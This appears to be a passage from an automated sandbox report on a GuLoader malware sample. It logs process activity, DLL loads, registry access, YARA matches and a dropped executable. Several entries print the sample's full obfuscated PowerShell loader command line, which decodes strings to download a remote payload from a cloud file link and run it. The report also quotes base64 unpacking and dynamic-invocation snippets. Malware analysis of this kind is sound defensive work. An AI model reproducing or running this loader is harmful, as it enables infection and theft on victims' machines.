Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: ore.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb source: powershell.exe, 00000004.00000002.3052757147.0000000007665000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3031770631.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdbGCTL source: 31437F.exe.20.dr
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dxdiag.pdb source: 31437F.exe.20.dr

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress", "0")

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR
Source: Yara match	File source: 00000004.00000002.3059770247.000000000A8DE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3059410794.0000000008A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Paradeful)$global:Regionplanarbejder = [System.Text.Encoding]::ASCII.GetString($Sydforhngenes)$global:Snigveje=$Regionplanarbejder.substring($Diktatet,$Syntaksgenkendelserne)<#Swordm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sluds $Mismeasuring $Demonstrating), (Tablelands46 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:duchesser = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nonvital)), $Luskeriers).DefineDynamicModule($Lampooning, $false).DefineType($Behight, $Bundtedes, [System.MulticastDelegate])$Distrah
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Paradeful)$global:Regionplanarbejder = [System.Text.Encoding]::ASCII.GetString($Sydforhngenes)$global:Snigveje=$Regionplanarbejder.substring($Diktatet,$Syntaksgenkendelserne)<#Swordm

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd	Jump to behavior

Binary contains a suspicious time stamp

Source: 31437F.exe.20.dr

Static PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D600BD pushad ; iretd	2_2_00007FF848D600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E34DC9 push ebx; ret	2_2_00007FF848E34F5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310326B push cs; iretd	4_2_0310326F

Drops PE files

Source: C:\Windows\SysWOW64\dxdiag.exe

File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
